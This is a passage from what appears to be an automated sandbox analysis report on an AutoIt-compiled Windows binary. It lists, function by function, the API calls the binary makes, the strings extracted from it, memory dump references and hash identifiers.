                                    • CopySid.ADVAPI32(00000000), ref: 0016A9C4
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0016A9F5
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0016AA1B
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0016AA2F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: 29bbb29d70ba2e3258c23bc646bd5d48b65d62d42c3f0a8bc6c8ee9d745abeb4
                                    • Instruction ID: c1ed88d5d0b8bd117dfd080df116a59bded07c4831ec195249f819954f828bc6
                                    • Opcode Fuzzy Hash: 29bbb29d70ba2e3258c23bc646bd5d48b65d62d42c3f0a8bc6c8ee9d745abeb4
                                    • Instruction Fuzzy Hash: 7B515B71900209ABDF14DF94DC85AEEBB79FF04304F54822AF811E7291EB719A55CF61
                                    Function 0017CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 2889450990-2391861430
                                    • Opcode ID: 05adedf168e9c5dd46ddc3d90f73e47d9466f0a96c4ae95cfbdc8a63a5c67bbe
                                    • Instruction ID: 322dcc553fb61e85609a44315599361178835f6ed19dc1551764d11995f9bf0d
                                    • Opcode Fuzzy Hash: 05adedf168e9c5dd46ddc3d90f73e47d9466f0a96c4ae95cfbdc8a63a5c67bbe
                                    • Instruction Fuzzy Hash: D9518E31800509BBCB15EBE0DD46EEEBB79AF28344F104169F515720A2EB316F99DFA1
                                    Function 0017CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 2889450990-3420473620
                                    • Opcode ID: 1386ed502c1232bcf32b56ff2418fcefbef27f50d1881cd25d632246ab902461
                                    • Instruction ID: e8d766ef2caba46950e2d0e00c81b07394ed660585eefeef996c6d263b222ddf
                                    • Opcode Fuzzy Hash: 1386ed502c1232bcf32b56ff2418fcefbef27f50d1881cd25d632246ab902461
                                    • Instruction Fuzzy Hash: 5F518F31900609BACB15EBE0DD46EEEB779AF24344F104069F509730A2EB716F99DFA1
                                    Function 001755BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 001755D7
                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00175664
                                    • GetMenuItemCount.USER32(001F1708), ref: 001756ED
                                    • DeleteMenu.USER32(001F1708,00000005,00000000,000000F5,?,?), ref: 0017577D
                                    • DeleteMenu.USER32(001F1708,00000004,00000000), ref: 00175785
                                    • DeleteMenu.USER32(001F1708,00000006,00000000), ref: 0017578D
                                    • DeleteMenu.USER32(001F1708,00000003,00000000), ref: 00175795
                                    • GetMenuItemCount.USER32(001F1708), ref: 0017579D
                                    • SetMenuItemInfoW.USER32(001F1708,00000004,00000000,00000030), ref: 001757D3
                                    • GetCursorPos.USER32(?), ref: 001757DD
                                    • SetForegroundWindow.USER32(00000000), ref: 001757E6
                                    • TrackPopupMenuEx.USER32(001F1708,00000000,?,00000000,00000000,00000000), ref: 001757F9
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00175805
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 3993528054-0
                                    • Opcode ID: 1e448885b5875ba4243aa8364ea97a87c4903efc2dc10395cee5d17f1bb434a9
                                    • Instruction ID: 9c15917133c86c76e52d138c05b57d672f82c4d596771d22f89e2862ce4c1826
                                    • Opcode Fuzzy Hash: 1e448885b5875ba4243aa8364ea97a87c4903efc2dc10395cee5d17f1bb434a9
                                    • Instruction Fuzzy Hash: 7B710070640A05BFEB249B55DC49FAABF76FF00368F648209F51DAA1E0C7B16C50CB94
                                    Function 0016A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0016A1DC
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0016A211
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0016A22D
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0016A249
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0016A273
                                    • CLSIDFromString.COMBASE(?,?), ref: 0016A29B
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0016A2A6
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0016A2AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 1687751970-22481851
                                    • Opcode ID: be729d350ae96eb2f6a8e7a6d561c2cbe9118c0b2352fe30dce5ff0566211ff5
                                    • Instruction ID: 5a61d2d1cd8d579070a86dce3fdc9f0b415c89d91eb99d7671beda6332e15e3c
                                    • Opcode Fuzzy Hash: be729d350ae96eb2f6a8e7a6d561c2cbe9118c0b2352fe30dce5ff0566211ff5
                                    • Instruction Fuzzy Hash: 16410476C10229ABCB25EBA4EC95DEEB7B8BF18740F404169F901B3161EB709E55CF90
                                    Function 00193C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    • Opcode ID: 71aa95beaebe5647e6a98262b0712eed6ffb9d21395ee4a2cd1aa414ee4841be
                                    • Instruction ID: 14cc9bbb6ed4b681a40d98aa9e51f4cca52cf2367ea32d2080db2757ce55347b
                                    • Opcode Fuzzy Hash: 71aa95beaebe5647e6a98262b0712eed6ffb9d21395ee4a2cd1aa414ee4841be
                                    • Instruction Fuzzy Hash: 6E41753050028A8BDF14EF51D991AEF33A5FF22344F504454FC652B2A6EB70EE0ACB50
                                    Function 001725B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001A36F4,00000010,?,Bad directive syntax error,001CDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 001725D6
                                    • LoadStringW.USER32(00000000,?,001A36F4,00000010), ref: 001725DD
                                    • _wprintf.LIBCMT ref: 00172610
                                    • __swprintf.LIBCMT ref: 00172632
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001726A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 1080873982-4153970271
                                    • Opcode ID: 05a56d72b4b0fbe5a1d2654e8d9dff6517c6da7ffe729c43c6c299c0d27da1ef
                                    • Instruction ID: db6e4190c7d89584746aef76898d085e8435dc4313be1770b2ce0b55c091efdc
                                    • Opcode Fuzzy Hash: 05a56d72b4b0fbe5a1d2654e8d9dff6517c6da7ffe729c43c6c299c0d27da1ef
                                    • Instruction Fuzzy Hash: EA21303180021AFFCF15AF90CC4AFEE7B79BF28704F044465F915660A2EB71A659DB51
                                    Function 00177AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00177B42
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00177B58
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00177B69
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00177B7B
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00177B8C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: SendString
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 890592661-1007645807
                                    • Opcode ID: ce97566c3f7abda778d31eccad27873663c757771a620acabfc070a5f75e1016
                                    • Instruction ID: c2f8c5182d51195c09100ceb11c1b32af08adc51e1eade34fcf957fa5c34ca46
                                    • Opcode Fuzzy Hash: ce97566c3f7abda778d31eccad27873663c757771a620acabfc070a5f75e1016
                                    • Instruction Fuzzy Hash: 9F1182A1A9029979D724A7A2DC4ADFF7ABCEBA1B10F0005197425A30D1EB601A45C6A0
                                    Function 0017778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • timeGetTime.WINMM ref: 00177794
                                      • Part of subcall function 0014DC38: timeGetTime.WINMM(?,76C1B400,001A58AB), ref: 0014DC3C
                                    • Sleep.KERNEL32(0000000A), ref: 001777C0
                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 001777E4
                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00177806
                                    • SetActiveWindow.USER32 ref: 00177825
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00177833
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00177852
                                    • Sleep.KERNEL32(000000FA), ref: 0017785D
                                    • IsWindow.USER32 ref: 00177869
                                    • EndDialog.USER32(00000000), ref: 0017787A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: 0ff3b4e6bb1cdd7e263ffeb0e9ad1d4219cdcdc53fcecc5ad64f13769dbe8c79
                                    • Instruction ID: 8598042727994cc5352a3706ee2b040ae24ff58afbfd895b843f51f1a69c11a3
                                    • Opcode Fuzzy Hash: 0ff3b4e6bb1cdd7e263ffeb0e9ad1d4219cdcdc53fcecc5ad64f13769dbe8c79
                                    • Instruction Fuzzy Hash: BC213BB0244205AFE7199B60FC8DA367F79FB44348F018124F52E829A2EB719D81DA21
                                    Function 001802EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • CoInitialize.OLE32(00000000), ref: 0018034B
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001803DE
                                    • SHGetDesktopFolder.SHELL32(?), ref: 001803F2
                                    • CoCreateInstance.COMBASE(001BDA8C,00000000,00000001,001E3CF8,?), ref: 0018043E
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001804AD
                                    • CoTaskMemFree.COMBASE(?), ref: 00180505
                                    • _memset.LIBCMT ref: 00180542
                                    • SHBrowseForFolderW.SHELL32(?), ref: 0018057E
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001805A1
                                    • CoTaskMemFree.COMBASE(00000000), ref: 001805A8
                                    • CoTaskMemFree.COMBASE(00000000), ref: 001805DF
                                    • CoUninitialize.COMBASE ref: 001805E1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 1246142700-0
                                    • Opcode ID: 21280a0f74e20161266033d104ad68b5a35f5b0f63ae1bce5d0e12eb3d63c0cd
                                    • Instruction ID: 4f89489c22b8f29e3a723b956d237c069f77205b2fe3360a05ad93a0f786acb0
                                    • Opcode Fuzzy Hash: 21280a0f74e20161266033d104ad68b5a35f5b0f63ae1bce5d0e12eb3d63c0cd
                                    • Instruction Fuzzy Hash: 6BB1C775A00109AFDB05DFA4D889DAEBBB9FF48314B148469F805EB251DB70EE45CF50
                                    Function 00172E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00172ED6
                                    • SetKeyboardState.USER32(?), ref: 00172F41
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00172F61
                                    • GetKeyState.USER32(000000A0), ref: 00172F78
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00172FA7
                                    • GetKeyState.USER32(000000A1), ref: 00172FB8
                                    • GetAsyncKeyState.USER32(00000011), ref: 00172FE4
                                    • GetKeyState.USER32(00000011), ref: 00172FF2
                                    • GetAsyncKeyState.USER32(00000012), ref: 0017301B
                                    • GetKeyState.USER32(00000012), ref: 00173029
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00173052
                                    • GetKeyState.USER32(0000005B), ref: 00173060
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 7b1e642e858b6595db2dd91abb14d9ac79674d90ec79dfab98091eb937e17c77
                                    • Instruction ID: 3d6a0e137ceedc7ab13731357d7c01f94fc7fee9eeff3d36449c09d7e831d677
                                    • Opcode Fuzzy Hash: 7b1e642e858b6595db2dd91abb14d9ac79674d90ec79dfab98091eb937e17c77
                                    • Instruction Fuzzy Hash: 8051C760A0479829FB35EBA48811BEABFB45F11340F08C59DD5CA571C2DF64AB8DCB62
                                    Function 0016ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 0016ED1E
                                    • GetWindowRect.USER32(00000000,?), ref: 0016ED30
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0016ED8E
                                    • GetDlgItem.USER32(?,00000002), ref: 0016ED99
                                    • GetWindowRect.USER32(00000000,?), ref: 0016EDAB
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0016EE01
                                    • GetDlgItem.USER32(?,000003E9), ref: 0016EE0F
                                    • GetWindowRect.USER32(00000000,?), ref: 0016EE20
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0016EE63
                                    • GetDlgItem.USER32(?,000003EA), ref: 0016EE71
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0016EE8E
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0016EE9B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: 31f508ae855be50355b0b110cecb33bb2e8fdffa82e0a1f9a8f9251a0cf70780
                                    • Instruction ID: d3151e8d58babd9ee59132510438a3215d658a235b20713732398329c78a842c
                                    • Opcode Fuzzy Hash: 31f508ae855be50355b0b110cecb33bb2e8fdffa82e0a1f9a8f9251a0cf70780
                                    • Instruction Fuzzy Hash: 5D512275B00205AFDB18CFA9DD95AAEBBFAFB88700F14822DF519D7290E7719D448B10
                                    Function 0014B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • GetSysColor.USER32(0000000F), ref: 0014B438
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: 7f9bae572af1f5875191117fd9569478a5b8fc060a52fad913529e1a8576a8b8
